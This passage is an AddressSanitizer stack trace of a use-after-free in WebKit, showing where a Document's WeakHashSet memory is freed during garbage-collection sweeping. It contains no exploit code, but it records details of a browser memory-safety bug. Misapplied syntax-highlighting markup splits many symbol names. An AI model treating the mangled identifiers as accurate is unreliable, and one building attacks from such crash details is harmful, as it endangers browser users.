class="hljs-number">0</span>x7fbca<span class="hljs-number">9342177</span> (<unknown module>)<br><br><span class="hljs-number">0</span>x60<span class="hljs-number">70000b4a48</span> is located <span class="hljs-number">8</span> bytes inside of <span class="hljs-number">80</span>-byte region [<span class="hljs-number">0</span>x60<span class="hljs-number">70000b4a40</span>,<span class="hljs-number">0</span>x60<span class="hljs-number">70000b4a90</span>)<br>freed by thread T0 here:<br> #<span class="hljs-number">0</span> <span class="hljs-number">0</span>x7fbd0ae8f7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.<span class="hljs-number">4</span>+<span class="hljs-number">0</span>xde7a8)<br> #<span class="hljs-number">1</span> <span class="hljs-number">0</span>x7fbcfc05f8a8 in WT<span class="hljs-number">F::</span>fastFree(void*) Source/WTF/wtf/FastMalloc.cpp:<span class="hljs-number">226</span><br> #<span class="hljs-number">2</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">01f9a1c9</span> in WT<span class="hljs-number">F::</span>FastMallo<span class="hljs-number">c::</span>free(void*) DerivedSources/ForwardingHeaders/wtf/FastMalloc.h:<span class="hljs-number">228</span><br> #<span class="hljs-number">3</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">01f9a1c9</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, 
WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>deallocateTable(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >*) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">1226</span><br> #<span class="hljs-number">4</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0598f680</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span 
class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > >::~HashTable() DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">412</span><br> #<span class="hljs-number">5</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0598f680</span> in WT<span class="hljs-number">F::</span>HashSet<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > >::~HashSet() DerivedSources/ForwardingHeaders/wtf/HashSet.h:<span class="hljs-number">33</span><br> #<span class="hljs-number">6</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0598f680</span> in WT<span class="hljs-number">F::</span>WeakHashSet<WebCor<span class="hljs-number">e::</span>DocumentTimeline>::~WeakHashSet() DerivedSources/ForwardingHeaders/wtf/WeakHashSet.h:<span class="hljs-number">44</span><br> #<span class="hljs-number">7</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0598f680</span> in WebCor<span class="hljs-number">e::</span>Document::~Document() Source/WebCore/dom/Document.cpp:<span 
class="hljs-number">628</span><br> #<span class="hljs-number">8</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">060f6574</span> in WebCor<span class="hljs-number">e::</span>HTMLDocument::~HTMLDocument() Source/WebCore/html/HTMLDocument.h:<span class="hljs-number">29</span><br> #<span class="hljs-number">9</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">060f6660</span> in WebCor<span class="hljs-number">e::</span>HTMLDocument::~HTMLDocument() Source/WebCore/html/HTMLDocument.h:<span class="hljs-number">29</span><br> #<span class="hljs-number">10</span> <span class="hljs-number">0</span>x7fbd0599b49c in WebCor<span class="hljs-number">e::</span>Document<span class="hljs-number">::</span>removedLastRef() Source/WebCore/dom/Document.cpp:<span class="hljs-number">766</span><br> #<span class="hljs-number">11</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05b2a2a7</span> in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>removedLastRef() Source/WebCore/dom/Node.cpp:<span class="hljs-number">2533</span><br> #<span class="hljs-number">12</span> <span class="hljs-number">0</span>x7fbd05b2fa14 in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>deref() const Source/WebCore/dom/Node.h:<span class="hljs-number">716</span><br> #<span class="hljs-number">13</span> <span class="hljs-number">0</span>x7fbd05b2fa14 in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>derefEventTarget() Source/WebCore/dom/Node.cpp:<span class="hljs-number">825</span><br> #<span class="hljs-number">14</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>deref() Source/WebCore/dom/EventTarget.h:<span class="hljs-number">58</span><br> #<span class="hljs-number">15</span> <span class="hljs-number">0</span>x7fbd038f70cd in WT<span 
class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>EventTarget, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>EventTarget> >::~Ref() DerivedSources/ForwardingHeaders/wtf/Ref.h:<span class="hljs-number">61</span><br> #<span class="hljs-number">16</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>JSDOMWrapper<WebCor<span class="hljs-number">e::</span>EventTarget>::~JSDOMWrapper() Source/WebCore/bindings/js/JSDOMWrapper.h:<span class="hljs-number">71</span><br> #<span class="hljs-number">17</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>JSEventTarget::~JSEventTarget() DerivedSources/WebCore/JSEventTarget.h:<span class="hljs-number">30</span><br> #<span class="hljs-number">18</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>JSEventTarget<span class="hljs-number">::</span>destroy(JS<span class="hljs-number">C::</span>JSCell*) DerivedSources/WebCore/JSEventTarget.cpp:<span class="hljs-number">234</span><br> #<span class="hljs-number">19</span> <span class="hljs-number">0</span>x7fbcfb288c7c in JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFun<span class="hljs-number">c::</span>operator()(JS<span class="hljs-number">C::</span>VM&, JS<span class="hljs-number">C::</span>JSCell*) const Source/JavaScriptCore/runtime/JSDestructibleObjectHeapCellType.cpp:<span class="hljs-number">37</span><br> #<span class="hljs-number">20</span> <span class="hljs-number">0</span>x7fbcfb288c7c in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>specializedSweep<true, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode)<span class="hljs-number">1</span>, (JS<span 
class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode)<span class="hljs-number">0</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode)<span class="hljs-number">1</span>, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&)::{lambda(void*)#<span class="hljs-number">1</span>}<span 
class="hljs-number">::</span>operator()(void*) const Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">260</span><br> #<span class="hljs-number">21</span> <span class="hljs-number">0</span>x7fbcfb288c7c in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>specializedSweep<true, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode)<span class="hljs-number">0</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode)<span class="hljs-number">1</span>, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode, JS<span 
class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&)::{lambda(unsigned long)#<span class="hljs-number">3</span>}<span class="hljs-number">::</span>operator()(unsigned long) const Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">319</span><br> #<span class="hljs-number">22</span> <span class="hljs-number">0</span>x7fbcfb288c7c in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>specializedSweep<true, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode)<span class="hljs-number">0</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode)<span 
class="hljs-number">1</span>, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&) Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">341</span><br> #<span class="hljs-number">23</span> <span class="hljs-number">0</span>x7fbcfb266d9b in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>finishSweepKnowingHeapCellType<JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&)::{lambda()#<span class="hljs-number">1</span>}<span class="hljs-number">::</span>operator()() const Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">423</span><br> #<span class="hljs-number">24</span> <span class="hljs-number">0</span>x7fbcfb266d9b in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span 
class="hljs-number">e::</span>finishSweepKnowingHeapCellType<JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&) Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">435</span><br> #<span class="hljs-number">25</span> <span class="hljs-number">0</span>x7fbcfb266d9b in JS<span class="hljs-number">C::</span>JSDestructibleObjectHeapCellTyp<span class="hljs-number">e::</span>finishSweep(JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handle&, JS<span class="hljs-number">C::</span>FreeList*) Source/JavaScriptCore/runtime/JSDestructibleObjectHeapCellType.cpp:<span class="hljs-number">52</span><br> #<span class="hljs-number">26</span> <span class="hljs-number">0</span>x7fbcfa4f4c96 in JS<span class="hljs-number">C::</span>Subsp<span class="hljs-number">ace::</span>finishSweep(JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handle&, JS<span class="hljs-number">C::</span>FreeList*) Source/JavaScriptCore/heap/Subspace.cpp:<span class="hljs-number">64</span><br> #<span class="hljs-number">27</span> <span class="hljs-number">0</span>x7fbcfa4c9381 in JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>sweep(JS<span class="hljs-number">C::</span>FreeList*) Source/JavaScriptCore/heap/MarkedBlock.cpp:<span class="hljs-number">419</span><br> #<span class="hljs-number">28</span> <span class="hljs-number">0</span>x7fbcfa48459c in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>tryAllocateIn(JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handle*) Source/JavaScriptCore/heap/LocalAllocator.cpp:<span class="hljs-number">226</span><br> #<span class="hljs-number">29</span> <span 
class="hljs-number">0</span>x7fbcfa484d0a in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>tryAllocateWithoutCollecting() Source/JavaScriptCore/heap/LocalAllocator.cpp:<span class="hljs-number">192</span><br> #<span class="hljs-number">30</span> <span class="hljs-number">0</span>x7fbcfa48e44e in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocateSlowCase(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) Source/JavaScriptCore/heap/LocalAllocator.cpp:<span class="hljs-number">133</span><br> #<span class="hljs-number">31</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode)::{lambda()#<span class="hljs-number">1</span>}<span class="hljs-number">::</span>operator()() const DerivedSources/ForwardingHeaders/JavaScriptCore/LocalAllocatorInlines.h:<span class="hljs-number">40</span><br> #<span class="hljs-number">32</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>HeapCell* JS<span class="hljs-number">C::</span>FreeList<span class="hljs-number">::</span>allocate<JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode)::{lambda()#<span class="hljs-number">1</span>}>(JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span 
class="hljs-number">C::</span>AllocationFailureMode)::{lambda()#<span class="hljs-number">1</span>} const&) DerivedSources/ForwardingHeaders/JavaScriptCore/FreeListInlines.h:<span class="hljs-number">46</span><br> #<span class="hljs-number">33</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) DerivedSources/ForwardingHeaders/JavaScriptCore/LocalAllocatorInlines.h:<span class="hljs-number">41</span><br> #<span class="hljs-number">34</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>Allocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) const DerivedSources/ForwardingHeaders/JavaScriptCore/AllocatorInlines.h:<span class="hljs-number">35</span><br> #<span class="hljs-number">35</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>CompleteSubsp<span class="hljs-number">ace::</span>allocateNonVirtual(JS<span class="hljs-number">C::</span>VM&, unsigned long, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) DerivedSources/ForwardingHeaders/JavaScriptCore/CompleteSubspaceInlines.h:<span class="hljs-number">39</span><br> #<span class="hljs-number">36</span> <span class="hljs-number">0</span>x7fbd03af7167 in void* JS<span class="hljs-number">C::</span>tryAllocateCellHelper<WebCor<span class="hljs-number">e::</span>JSHTMLScriptElement>(JS<span class="hljs-number">C::</span>Heap&, unsigned long, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span 
class="hljs-number">C::</span>AllocationFailureMode) DerivedSources/ForwardingHeaders/JavaScriptCore/JSCellInlines.h:<span class="hljs-number">163</span><br> #<span class="hljs-number">37</span> <span class="hljs-number">0</span>x7fbd03af7167 in void* JS<span class="hljs-number">C::</span>allocateCell<WebCor<span class="hljs-number">e::</span>JSHTMLScriptElement>(JS<span class="hljs-number">C::</span>Heap&, unsigned long) DerivedSources/ForwardingHeaders/JavaScriptCore/JSCellInlines.h:<span class="hljs-number">177</span><br> #<span class="hljs-number">38</span> <span class="hljs-number">0</span>x7fbd03af7167 in WebCor<span class="hljs-number">e::</span>JSHTMLScriptElement<span class="hljs-number">::</span>create(JS<span class="hljs-number">C::</span>Structure*, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement> >&&) DerivedSources/WebCore/JSHTMLScriptElement.h:<span class="hljs-number">35</span><br> #<span class="hljs-number">39</span> <span class="hljs-number">0</span>x7fbd03af7167 in st<span class="hljs-number">d::</span>enable_if<st<span class="hljs-number">d::</span>is_same<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLScriptElement><span class="hljs-number">::</span>value, WebCor<span class="hljs-number">e::</span>JSDOMWrapperConverterTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement><span class="hljs-number">::</span>WrapperClass*><span class="hljs-number">::</span>type WebCor<span class="hljs-number">e::</span>createWrapper<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLScriptElement>(WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span 
class="hljs-number">e::</span>HTMLScriptElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement> >&&) Source/WebCore/bindings/js/JSDOMWrapperCache.h:<span class="hljs-number">187</span><br> #<span class="hljs-number">40</span> <span class="hljs-number">0</span>x7fbd03af7167 in st<span class="hljs-number">d::</span>enable_if<!st<span class="hljs-number">d::</span>is_same<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLElement><span class="hljs-number">::</span>value, WebCor<span class="hljs-number">e::</span>JSDOMWrapperConverterTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement><span class="hljs-number">::</span>WrapperClass*><span class="hljs-number">::</span>type WebCor<span class="hljs-number">e::</span>createWrapper<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLElement>(WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLElement> >&&) Source/WebCore/bindings/js/JSDOMWrapperCache.h:<span class="hljs-number">194</span><br> #<span class="hljs-number">41</span> <span class="hljs-number">0</span>x7fbd03af7167 in createHTMLScriptElementWrapper DerivedSources/WebCore/JSHTMLElementWrapperFactory.cpp:<span class="hljs-number">527</span><br> #<span class="hljs-number">42</span> <span class="hljs-number">0</span>x7fbd03b10e86 in WebCor<span class="hljs-number">e::</span>createJSHTMLWrapper(WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLElement> >&&) 
DerivedSources/WebCore/JSHTMLElementWrapperFactory.cpp:<span class="hljs-number">795</span><br> #<span class="hljs-number">43</span> <span class="hljs-number">0</span>x7fbd0511cd70 in createNewElementWrapper Source/WebCore/bindings/js/JSElementCustom.cpp:<span class="hljs-number">55</span><br> #<span class="hljs-number">44</span> <span class="hljs-number">0</span>x7fbd0511cd70 in WebCor<span class="hljs-number">e::</span>toJSNewlyCreated(JS<span class="hljs-number">C::</span>JSGlobalObject*, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> >&&) Source/WebCore/bindings/js/JSElementCustom.cpp:<span class="hljs-number">77</span><br> #<span class="hljs-number">45</span> <span class="hljs-number">0</span>x7fbd037ec467 in JS<span class="hljs-number">C::</span>JSValue WebCor<span class="hljs-number">e::</span>JSConverter<WebCor<span class="hljs-number">e::</span>IDLInterface<WebCor<span class="hljs-number">e::</span>Element> ><span class="hljs-number">::</span>convertNewlyCreated<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > >(JS<span class="hljs-number">C::</span>JSGlobalObject&, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject&, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> >&&) Source/WebCore/bindings/js/JSDOMConvertInterface.h:<span class="hljs-number">87</span><br> #<span class="hljs-number">46</span> <span class="hljs-number">0</span>x7fbd037ec467 in JS<span class="hljs-number">C::</span>JSValue WebCor<span 
class="hljs-number">e::</span>toJSNewlyCreated<WebCor<span class="hljs-number">e::</span>IDLInterface<WebCor<span class="hljs-number">e::</span>Element>, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > >(JS<span class="hljs-number">C::</span>JSGlobalObject&, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject&, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> >&&) Source/WebCore/bindings/js/JSDOMConvertBase.h:<span class="hljs-number">162</span><br> #<span class="hljs-number">47</span> <span class="hljs-number">0</span>x7fbd037ec467 in st<span class="hljs-number">d::</span>enable_if<WebCor<span class="hljs-number">e::</span>IsExceptionOr<WebCor<span class="hljs-number">e::</span>ExceptionOr<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > > ><span class="hljs-number">::</span>value, JS<span class="hljs-number">C::</span>JSValue><span class="hljs-number">::</span>type WebCor<span class="hljs-number">e::</span>toJSNewlyCreated<WebCor<span class="hljs-number">e::</span>IDLInterface<WebCor<span class="hljs-number">e::</span>Element>, WebCor<span class="hljs-number">e::</span>ExceptionOr<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > > >(JS<span class="hljs-number">C::</span>JSGlobalObject&, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject&, JS<span class="hljs-number">C::</span>ThrowScope&, WebCor<span class="hljs-number">e::</span>ExceptionOr<WT<span 
